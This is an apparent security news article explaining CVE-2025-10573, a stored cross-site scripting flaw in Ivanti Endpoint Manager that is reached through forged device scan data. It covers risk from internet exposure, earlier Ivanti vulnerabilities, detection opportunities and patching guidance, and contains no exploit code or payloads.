A newly disclosed Ivanti Endpoint Manager code execution flaw, tracked as CVE-2025-10573, turns the product’s web dashboard into a high-value target. The issue enables an unauthenticated attacker to place malicious JavaScript into the management interface and, after a single admin click, take over that administrator’s browser session. For organizations that rely on Ivanti EPM to control Windows, macOS, Linux, ChromeOS, and even IoT endpoints, a compromised admin session is effectively a shortcut to the entire managed estate.
The vulnerability affects Ivanti Endpoint Manager instances running versions prior to EPM 2024 SU4 SR1. Those builds remain common in production, especially where change control is slow or where patching Ivanti infrastructure competes with other priorities.
How CVE-2025-10573 leads to code execution
At its core, CVE-2025-10573 is a stored cross-site scripting vulnerability in the Ivanti EPM web service. Instead of targeting end users through a traditional phishing page, the attacker abuses the way EPM ingests device scan data.
The product exposes an unauthenticated web endpoint that accepts inventory information from managed endpoints. An attacker can craft fake “devices” and submit scan data that embeds malicious JavaScript inside key fields. EPM then parses that data, stores it, and later renders it inside the administrator’s web dashboard.
From the attacker’s perspective, this is ideal. They do not need valid credentials, and they do not need network-level access to the management console beyond the exposed web service. Once the malicious data lands in the EPM database, it sits there until an administrator opens one of the poisoned dashboard views as part of normal work.
When that happens, the browser interprets the stored payload as script rather than plain data. The result is client-side JavaScript execution in the context of the admin’s authenticated session. With that control, an attacker can perform privileged actions on behalf of the administrator, including pushing software, changing policies, or pivoting into other systems tied to Ivanti Endpoint Manager.
From the admin’s point of view, the only “user interaction” required is viewing a familiar dashboard page. That makes this Ivanti Endpoint Manager code execution flaw particularly dangerous inside busy operations teams.
Why internet-exposed EPM servers increase the risk
Ivanti’s guidance stresses that Endpoint Manager cores are not designed to sit directly on the public internet. In many environments, though, legacy deployment choices and convenience have led to exactly that. Threat monitoring data has already shown hundreds of Ivanti EPM instances listening on public IP addresses, with a significant concentration in the United States, Germany, and Japan.
An internet-facing EPM server reduces the attacker’s barrier to entry. Instead of pivoting from an internal foothold, they can probe the exposed management interface directly and attempt to submit crafted device scans from anywhere. Even when internal-only, EPM remains a high-value target for insiders or for attackers that have already landed elsewhere in the network.
Organizations that still expose their EPM consoles to the internet should treat this as a priority architecture issue [Internal link 1]. A critical remote code execution pathway chained through the administrative dashboard gives an adversary far more leverage than a typical endpoint infection.
Additional Ivanti Endpoint Manager vulnerabilities in play
CVE-2025-10573 sits on top of a broader history of serious weaknesses in Ivanti Endpoint Manager appliances. Over the last two years, multiple flaws in EPM cores have allowed attackers to perform remote code execution or SQL injection against management servers. Some of those vulnerabilities, such as CVE-2024-29824, have been added to the CISA Known Exploited Vulnerabilities catalog after active abuse in the wild.
The pattern matters. Attackers already understand how much power they gain by compromising EPM infrastructure. Previous campaigns against Ivanti appliances show they are willing to invest in discovery, exploitation, and persistence on these platforms. A new critical stored XSS issue adds another tool to that playbook, particularly for adversaries that prefer stealthy session hijacking and living-off-the-land techniques.
For defenders, that history means the Ivanti Endpoint Manager code execution flaw is not an isolated one-off. It is part of a trend that should push security teams to reassess how they design, patch, and monitor management infrastructure as a category, not just Ivanti products alone.
Detection opportunities around this attack path
Although the vulnerability abuses normal product behavior, it does leave traces. Well-instrumented environments have several ways to spot suspicious activity.
On the network side, defenders can monitor for anomalous POST requests into the EPM device scan endpoint, especially those originating from non-managed hosts or unusual IP ranges. Requests that contain JavaScript-style characters or patterns in fields that typically carry inventory data are worth investigating.
On the server, logs tied to device ingestion, dashboard rendering, and session management may show correlations between new “devices” and sudden admin actions. If an attacker hijacks a browser session, you might see legitimate admin credentials performing actions from unusual IP addresses, user agents, or time windows that do not match the operator’s normal routine.
On the endpoint side, EPM’s own ability to push software and scripts becomes a detection vector. If the console suddenly starts deploying tools, remote shells, or unauthorized agents, that should trigger alerts in both EDR and centralized logging. Building specific detections for suspicious EPM actions, such as mass script execution outside maintenance windows, can help catch abuse early .
Patching and hardening Ivanti Endpoint Manager
Mitigation starts with patching. Ivanti has released EPM 2024 SU4 SR1 to remediate CVE-2025-10573. Any environment running older builds should plan an accelerated upgrade, especially where EPM consoles are reachable from semi-trusted or untrusted networks.
A practical approach combines several steps:
• First, inventory all Ivanti Endpoint Manager instances, including lab environments and regional cores that might have been forgotten.
• Second, verify which ones are exposed to the internet through direct access or through reverse proxies and VPN portals. Those should be prioritized for immediate patching or isolation.
• Third, review access control around the EPM web console. Restrict exposure to administrative networks, enforce strong MFA, and ensure only specific jump-hosts or management workstations can reach the interface.
Beyond patching, hardening should focus on reducing the impact of any future flaw. That includes segmenting management servers away from general user networks, ensuring backups of EPM infrastructure are both recent and tested, and monitoring for configuration drift that re-exposes services you thought were internal only.
Given Ivanti’s history of impactful bugs, teams should fold EPM into existing vulnerability management runbooks rather than treating it as a “set and forget” tool.
Strategic lessons for defenders
This incident reinforces several strategic points for defenders who rely on unified endpoint management platforms.
First, management tiers are often the most powerful part of your environment but receive the least security scrutiny. A compromise of Ivanti Endpoint Manager or a similar product has far more blast radius than a single workstation infection. The Ivanti Endpoint Manager code execution flaw shows how even a seemingly “just XSS” issue can convert into full administrative control.
Second, “not intended to be internet-facing” is not a control. If a product vendor writes that in a security advisory, it usually means there are customers running it that way in production. Security teams should assume misconfigurations exist and actively search for exposed management interfaces, not just trust design diagrams.
Third, attackers keep track of vendor ecosystems. Once a platform like Ivanti EPM becomes a proven gateway into high-value environments, new vulnerabilities in that platform automatically gain more attention from capable threat actors. That reality should influence patching priority, threat modeling, and how quickly organizations move away from risky default architectures.
Finally, this case is another reminder that application-layer vulnerabilities, especially those tied to complex management products, rarely live in isolation. Defenders should pursue layered defenses: network segmentation, strict access control, robust logging, and dedicated detection logic around powerful administrative tools. When those layers work together, even a critical web vulnerability has less chance of turning into a full-scale compromise.
